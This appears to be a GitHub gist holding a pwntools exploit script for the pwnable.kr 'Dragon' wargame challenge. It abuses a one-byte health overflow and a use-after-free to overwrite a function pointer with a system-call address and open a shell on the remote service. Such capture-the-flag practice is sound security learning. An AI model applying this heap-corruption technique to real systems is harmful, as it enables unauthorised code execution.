Created
March 9, 2021 23:54
-
-
Save Pascal-0x90/67476ce5e7c8ead95d4501ba55749949 to your computer and use it in GitHub Desktop.
Pwnable.kr Solve: Dragon
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
################################### | |
# Std imports | |
import sys | |
# Third party Imports | |
from pwn import * | |
# Binary | |
BINARY = sys.argv[1] | |
# Pwntools Binary info | |
context(os='linux', arch='i386') | |
r = ROP(BINARY) | |
e = ELF(BINARY) | |
l = e.libc | |
# Connections and interactions | |
#p = process(BINARY) | |
p = remote("pwnable.kr", 9004) | |
# GDB anyone? | |
#gdb.attach(p) | |
#input("Ready to roll?") | |
################################### | |
''' | |
Notes: | |
- Dragons health is a single byte. Max is 0xff, we could overflow this so we win. (big num becomes smol num) | |
- This allows us to then overwrite a previous location using a UAF since we use the same buffer which was freed. | |
- The "name" field becomes the same addr location as the dragon we defeated. | |
''' | |
SHELLCODE = b"" | |
JUNK = b"" | |
WIN = 0x08048DBF | |
''' | |
steps: | |
1. kill ourselves. | |
- This will malloc player, drag, free drag | |
2. Overflow the dragon, defeat dragon, overwrite former dragon with system addr. | |
3. Instead of calling PrintPlayerInfo, it will call the system instruction in secretroom. | |
''' | |
def die(p): | |
p.clean() | |
p.sendline("2") | |
p.clean() | |
p.sendline("1") | |
p.clean() | |
p.sendline("1") | |
def overheal(p): | |
p.clean() | |
# Select a fighter. I select priest because dragon can heal | |
p.sendline("1") | |
# Steps: Let drag heal twice, then you restore mana. 4 times is how many it takes | |
for i in range(4): | |
p.sendline("3") | |
p.sendline("3") | |
p.sendline("2") | |
# Overwrite with our desired win condition | |
p.clean() | |
p.sendline(p32(WIN)) | |
die(p) | |
overheal(p) | |
p.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment